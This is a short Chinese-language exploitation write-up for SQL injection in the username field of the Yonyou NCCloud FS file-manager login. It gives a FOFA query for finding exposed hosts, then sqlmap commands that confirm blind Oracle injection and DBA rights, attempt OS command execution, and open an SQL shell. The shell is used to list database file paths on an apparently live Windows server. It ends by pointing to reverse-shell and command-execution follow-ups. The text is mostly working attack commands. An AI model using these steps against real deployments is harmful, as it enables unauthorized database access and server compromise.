0x01 漏洞描述

用友 NCCloud FS文件管理登录页面对用户名参数没有过滤,存在SQL注入

0x02 FOFA

“NCCloud”

0x03 漏洞描述

登录页面如下
image.png
以下地址为fs文件服务器,以下地址正常打开则存在漏洞,如图,fofa试了比较少存在都删完了

http://xxx.xxx.xxx.xxx/fs/

image.png
登录请求包如下
image.png
使用Sqlmap对username参数 进行SQL注入,注意这里要加--level 3,不然容易失败,跑出结果为布尔盲注的``Oracle数据库

sqlmap -r sql.txt -p username —level 3

image.png
执行以下命令查看是否dba,此场景为dba

python sqlmap.py -r post.txt —level 3 -p username —is-dba

image.png
dba权限,所以尝试使用--os-shell,sqlmap不支持Oracle的--os-shell
dba权限,所以尝试使用--os-cmd,sqlmap不支持Oracle的--os-cmd

python sqlmap.py -r post.txt —level 3 -p username —is-dba —os-shell python sqlmap.py -r post.txt —level 3 -p username —is-dba —os-cmd id

image.png
dba权限,所以尝试—sql-shell,意思直接进入到oracle数据库执行sql语句;以下查看了数据文件位置,主要获取下数据库绝对路径,由此判断这是windows服务器

  1. python sqlmap.py -r post.txt --level 3 -p username --is-dba --sql-shell
  2. SQL> select name from v$datafile; 查看数据文件
  3. D:\APP\ADMINISTRATOR\ORADATA\ORCL\SYSTEM01.DBF
  4. SQL> select name from v$controlfile; 查看控件文件
  5. D:\APP\ADMINISTRATOR\ORADATA\ORCL\CONTROL01.CTL
  6. SQL> select member from v$logfile; 查看日志文件
  7. D:\APP\ADMINISTRATOR\ORADATA\ORCL\REDO03.LOG

image.png

0x04 后续思路

linux服务器,尝试命令执行
https://blog.csdn.net/qq_33020901/article/details/80221393
windwos服务器,尝试反弹shell
https://blog.csdn.net/weixin_38023368/article/details/76922153